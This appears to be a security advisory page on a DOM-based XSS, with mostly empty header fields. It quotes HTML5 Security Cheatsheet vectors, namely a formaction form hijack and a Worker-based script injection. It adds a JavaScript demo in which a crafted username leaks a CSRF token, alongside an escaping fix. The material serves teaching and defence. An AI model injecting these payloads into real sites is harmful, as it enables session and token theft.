
SSCHADV2013-010 - DOM-based Cross-site Scripting vulnerability

Advisory: - DOM-based Cross-site Scripting vulnerability
Advisory ID:
Stefan Schurtz
Affected Software:
Successfully tested on
Vendor URL:
Vendor Status:
Vulnerability Description


The website '' is prone to a DOM-based XSS vulnerability.

HTML5 Security Cheatsheet

Here you can find the HTML5 Security Cheatsheet, a good collection of XSS payloads built on HTML5 and browser-specific features.

For example:

XSS via formaction – requiring user interaction (1)

A vector displaying the HTML5 form and formaction capabilities for form hijacking outside the actual form. The form attribute binds the button to a form elsewhere in the document and formaction overrides that form's action, so the javascript: URL runs on click even though the injected markup sits outside the form.
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
Self-including DOM Worker XSS
A self-including code snippet utilizing a DOM worker and firing a message event to itself, causing script execution:
0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))
Worker("#") loads the current page itself as the worker script. Parsed as JavaScript, the <script>...</script> part is an E4X XML literal that the conditional discards; the worker then runs importScripts() on a data: URL whose base64 body is postMessage('alert(1)'), and the page's onmessage handler evals the message. The vector depends on E4X and on the function(_)expr expression-closure syntax, both Firefox-only extensions that have since been removed.
Self-hijacking JSON literals
In case parts of a JSON literal are controlled by user input, there is a risk of auto-harvesting the values of later object members.
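The precondition above (user input spliced into a JavaScript object literal) and one way a later member gets harvested, as an added example that is not from the cheatsheet or from this blog. Modern engines define literal members without invoking inherited setters, so the example defers the read of the later member to a callback the page fires after the literal has been assigned. All names (renderVulnerable, renderSafe, runPage, ready, leak, cfg, the token value) are hypothetical, and the attacker input is constructed.

```javascript
// Added example, not cheatsheet code. Names are hypothetical.

// Vulnerable: the server concatenates the username into an inline-script
// object literal, so the input can close the string and add members.
function renderVulnerable(username) {
  return 'var cfg = {"user":"' + username + '","csrfToken":"tok-1234"};';
}

// Hardened: JSON.stringify handles quotes and backslashes; the extra pass
// escapes the characters that are still dangerous inside <script> and the
// two line terminators JSON permits unescaped.
function toScriptLiteral(value) {
  return JSON.stringify(value).replace(/[<>&\u2028\u2029]/g, function (c) {
    return '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0');
  });
}

function renderSafe(username) {
  return 'var cfg = ' + toScriptLiteral({ user: username, csrfToken: 'tok-1234' }) + ';';
}

// Constructed attacker input. It closes the "user" string, adds a member whose
// value registers a callback, and re-opens a string so the literal stays valid.
// The callback closes over cfg and reads csrfToken, a member that appears later
// in the same literal, once the page has finished building it.
var ATTACKER_NAME = 'x","_":ready(function(){leak(cfg.csrfToken)}),"y":"z';

// Minimal stand-in for the browser: run the inline script with a ready(fn)
// hook modelling addEventListener('DOMContentLoaded', fn) and a leak(v) sink
// modelling an exfiltration request, then fire the registered callbacks.
function runPage(script) {
  var callbacks = [];
  var stolen = [];
  var cfg = new Function('ready', 'leak', script + '\nreturn cfg;')(
    function (fn) { callbacks.push(fn); },
    function (v) { stolen.push(v); }
  );
  callbacks.forEach(function (fn) { fn(); });
  return { cfg: cfg, stolen: stolen };
}
```

runPage(renderVulnerable(ATTACKER_NAME)).stolen contains the token; with renderSafe the same input is stored verbatim in cfg.user and nothing leaks. Escaping < and > also keeps a username such as </script> from terminating the script block.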